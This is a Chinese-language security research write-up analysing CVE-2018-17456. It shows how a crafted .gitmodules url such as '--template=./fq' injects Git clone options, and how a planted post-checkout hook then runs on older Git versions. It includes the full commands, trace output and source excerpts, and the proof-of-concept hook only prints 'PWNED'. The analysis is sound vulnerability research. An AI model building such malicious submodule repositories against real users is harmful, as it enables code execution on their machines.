Git Submodule 漏洞(CVE-2018-17456)分析

作者:Hcamael@知道创宇404实验室

国庆节的时候,Git爆了一个RCE的漏洞,放假回来进行应急,因为公开的相关资料比较少,挺头大的,搞了两天,RCE成功了

收集资料

一开始研究这个漏洞的时候,网上公开的资料非常少,最详细的也就github blog[1]的了。

得知发现该漏洞的作者是@joernchen, 去翻了下他的twitter,找到了一篇还算有用的推文:

另外在twitter搜索CVE-2018-17456,得到一篇@_staaldraad验证成功的推文:

可惜打了马赛克,另外还通过Google也零零散散找到一些有用的信息(url都找不到了),比如该漏洞无法在Windows上复现成功,因为:在Windows上不是有效的文件名。

 

研究分析

网上资料太少,只凭这点资料无法完成该漏洞的复现,所以只能自己通过源码、调试进行测试研究了。

使用woboq_codebrowser生成了git v2.19.1最新版的源码[2],方便审计。

通过源码发现在git命令前使用GIT_TRACE=1能开启git自带的命令跟踪,跟踪git的run_command

首先创建一个源,并创建其子模块(使用git v2.19.0进行测试):

$ git --version
git version 2.19.0.271.gfe8321e.dirty
$ mkdir evilrepo
$ cd evilrepo/
$ git init .
Initialized empty Git repository in /home/ubuntu/evilrepo/.git/
$ git submodule add https://github.com/Hcamael/hello-world.git test1
Cloning into '/home/ubuntu/evilrepo/test1'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (3/3), done.
$ cat .gitmodules
[submodule "test1"]
    path = test1
    url = https://github.com/Hcamael/hello-world.git

从搜集到的资料看,可以知道,该漏洞的触发点是url参数,如果使用-开始则会被解析成参数,所以尝试修改url

$ cat .gitmodules
[submodule "test1"]
    path = test1
    url = -test
$ rm -rf .git/modules/test1/
$ rm test1/.git
修改.git/config
$ cat .git/config
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true

这里可以选择把submodule的数据删除,可以可以选择直接修改url

$ cat .git/config
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
[submodule "test1"]
    active = true
    url = -test
$ GIT_TRACE=1 git submodule update --init

从输出结果中,我们可以看到一句命令:

git.c:415               trace: built-in: git clone --no-checkout --separate-git-dir /home/ubuntu/evilrepo/.git/modules/test1 -test /home/ubuntu/evilrepo/test1
error: unknown switch `t'

我们设置的-test被git clone识别为-t参数,漏洞点找到了,下面需要考虑的是,怎么利用git clone参数执行命令?

继续研究,发现git有处理特殊字符,比如空格:

$ cat .git/config
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
[submodule "test1"]
    active = true
    url = -te st

$ GIT_TRACE=1 git submodule update --init
.....
git.c:415               trace: built-in: git submodule--helper clone --path test1 --name test1 --url '-te st'
.....
git.c:415               trace: built-in: git clone --no-checkout --separate-git-dir /home/ubuntu/evilrepo/.git/modules/test1 '-te st' /home/ubuntu/evilrepo/test1
.....

如果有特殊字符,则会加上单引号

翻了下源码,找到了过滤的函数[3],是一个白名单过滤

只有大小写字母,数字和下面这几种特殊字符才不会加上单引号:

static const char ok_punct[] = "+,-./:=@_^";

感觉这空格是绕不过了(反正我绕不动)

接下来继续研究如果利用参数进行命令执行

在翻twitter的过程中还翻到了之前一个Git RCE(CVE-2018-11235)[4]的文章,发现是利用hook来达到RCE的效果,在结合之前@_staaldraad验证成功的推文

可以很容易的想到一个方法,不过在讲这个方法前,先讲一些git submodule的基础知识点吧

git submodule机制简单讲解

首先看看.gitmodules的几个参数:

[submodule "test1"]
    path = test2
    url = test3

test1表示的是submodule name,使用的参数是–name,子项目.git目录的数据会被储存到.git/modules/test1/目录下

test2表示的是子项目储存的路径,表示子项目的内容将会被储存到./test2/目录下

test3这个就很好理解,就是子项目的远程地址,如果是本地路径,就是拉去本地源

把本地项目push到远程,是无法把.git目录push上去的,只能push .gitmodules文件和test2目录

那么远程怎么识别该目录为submodule呢?在本地添加submodule的时候,会在test2目录下添加一个.git文件(在前面被我删除了,可以重新添加一个查看其内容)

$ cat test2/.git
gitdir: ../.git/modules/test1

指向的是该项目的.git路径,该文件不会被push到远程,但是在push的时候,该文件会让git识别出该目录是submodule目录,该目录下的其他文件将不会被提交到远程,并且在远程为该文件创建一个链接,指向submodule地址:

(我个人体会,可以看成是Linux下的软连接)

这个软连接是非常重要的,如果远程test2目录没有该软连接,.gitmodules文件中指向该路径的子项目在给clone到本地时(加了–recurse-submodules参数),该子项目将不会生效。

理解了submodule大致的工作机制后,就来说说RCE的思路

我们可以把url设置为如下:

url = --template=./template

这是一个模板选项,详细作用自己搜下吧

在设置了该选项的情况下,把子项目clone到本地时,子项目的.git目录被放到.git/modules/test1目录下,然后模板目录中,规定的几类文件也会被copy到.git/modules/test1目录下。这几类文件其中就是hook

所以,只有我们设置一个./template/hook/post-checkout,给post-checkout添加可执行权限,把需要执行的命令写入其中,在子项目执行git chekcout命令时,将会执行该脚本。

$ mkdir -p fq/hook
$ cat fq/hook/post-checkout
#!/bin/sh

date
echo 'PWNED'
$ chmod +x fq/hook/post-checkout
$ ll
total 24
drwxrwxr-x  5 ubuntu ubuntu 4096 Oct 12 16:48 ./
drwxr-xr-x 16 ubuntu ubuntu 4096 Oct 12 16:48 ../
drwxrwxr-x  3 ubuntu ubuntu 4096 Oct 12 16:47 fq/
drwxrwxr-x  8 ubuntu ubuntu 4096 Oct 12 15:59 .git/
-rw-rw-r--  1 ubuntu ubuntu   57 Oct 12 16:48 .gitmodules
drwxrwxr-x  2 ubuntu ubuntu 4096 Oct 12 16:46 test2/
$ cat .gitmodules
[submodule "test1"]
    path = test2
    url = --template=./fq
$ GIT_TRACE=1 git submodule update --init

设置好了PoC,再试一次,发现还是报错失败,主要问题如下:

git.c:415               trace: built-in: git clone --no-checkout --separate-git-dir /home/ubuntu/evilrepo/.git/modules/test1 --template=./fq /home/ubuntu/evilrepo/test2
fatal: repository '/home/ubuntu/evilrepo/test2' does not exist
fatal: clone of '--template=./fq' into submodule path '/home/ubuntu/evilrepo/test2' failed

来解析下该命令:

git clone --no-checkout --separate-git-dir /home/ubuntu/evilrepo/.git/modules/{name} {url} /home/ubuntu/evilrepo/{path}

我们把{url}设置为参数以后,/home/ubuntu/evilrepo/{path}就变成源地址了,该地址被判断为本地源目录,所以会查找该目录下的.git文件,但是之前说了,因为该目录被远程设置为软连接,所以clone到本地不会有其他文件,所以该目录是不可能存在.git目录的,因此该命令执行失败

再来看看是什么命令调用的该命令:

git.c:415               trace: built-in: git submodule--helper clone --path test2 --name test1 --url --template=./fq

解析下该命令:

git submodule--helper clone --path {path} --name {name} --url {url}

path, name, url都是我们可控的,但是都存在过滤,过滤规则同上面说的url白名单过滤规则。

该命令函数 -> [5]

我考虑过很多,path或name设置成–url=xxxxx

都失败了,因为–path和–name参数之后没有其他数据了,所以–url=xxxx都会被解析成name或path,这里就缺一个空格,但是如果存在空格,该数据则会被加上单引号,目前想不出bypass的方法

所以该命令的利用上毫无进展。。。。

所以关注点又回到了上一个git clone命令上:

git clone --no-checkout --separate-git-dir /home/ubuntu/evilrepo/.git/modules/{name} {url} /home/ubuntu/evilrepo/{path}

strbuf_addf(&sb, "%s/modules/%s", get_git_dir(), name);
sm_gitdir = absolute_pathdup(sb.buf);

/home/ubuntu/evilrepo/.git/modules/{name}路径是直接使用上面代码进行拼接,也找不到绕过的方法

最后就是/home/ubuntu/evilrepo/{path},如果git能把这个解析成远程地址就好了,所以想了个构造思路:/home/ubuntu/evilrepo/git@github.com:Hcamael/hello-world.git

但是失败了,还是被git解析成本地路径,看了下path的代码:

if (!is_absolute_path(path)) {
        strbuf_addf(&sb, "%s/%s", get_git_work_tree(), path);
        path = strbuf_detach(&sb, NULL);
    } else
        path = xstrdup(path);

因为git@github.com:Hcamael/hello-world.git被判断为非绝对路径,所以在前面加上了当前目录的路径,到这就陷入了死胡同了找不到任何解决办法

 

RCE

在不断的研究后发现,path=git@github.com:Hcamael/hello-world.git在低版本的git中竟然执行成功了。

首先看图:

使用的是ubuntu 16.04,默认的git是2.7.4,然后查了下该版本git的源码,发现该版本中并没有下面这几行代码

if (!is_absolute_path(path)) {
        strbuf_addf(&sb, "%s/%s", get_git_work_tree(), path);
        path = strbuf_detach(&sb, NULL);
    } else
        path = xstrdup(path);

所以构造的命令变成了:

$ git clone --no-checkout --separate-git-dir /home/ubuntu/evilrepo/.git/modules/test1 --template=./fq git@github.com:Hcamael/hello-world.git

之后把我执行成功的结果和@_staaldraad推文中的截图进行对比,发现几乎是一样的,所以猜测这个人复现的git环境也是使用低版本的git

 

总结

之后翻了下git的提交历史,发现2016年就已经添加了对path是否是绝对路径的判断。根据我的研究结果,CVE-2018-17456漏洞可以造成git选项参数注入,但是只有低版本的git才能根据该CVE造成RCE的效果。

 

引用

  1. https://blog.github.com/2018-10-05-git-submodule-vulnerability/
  2. https://0x48.pw/git/
  3. https://0x48.pw/git/git/quote.c.html#sq_quote_buf_pretty
  4. https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
  5. https://0x48.pw/git/git/builtin/submodule–helper.c.html#module_clone
(完)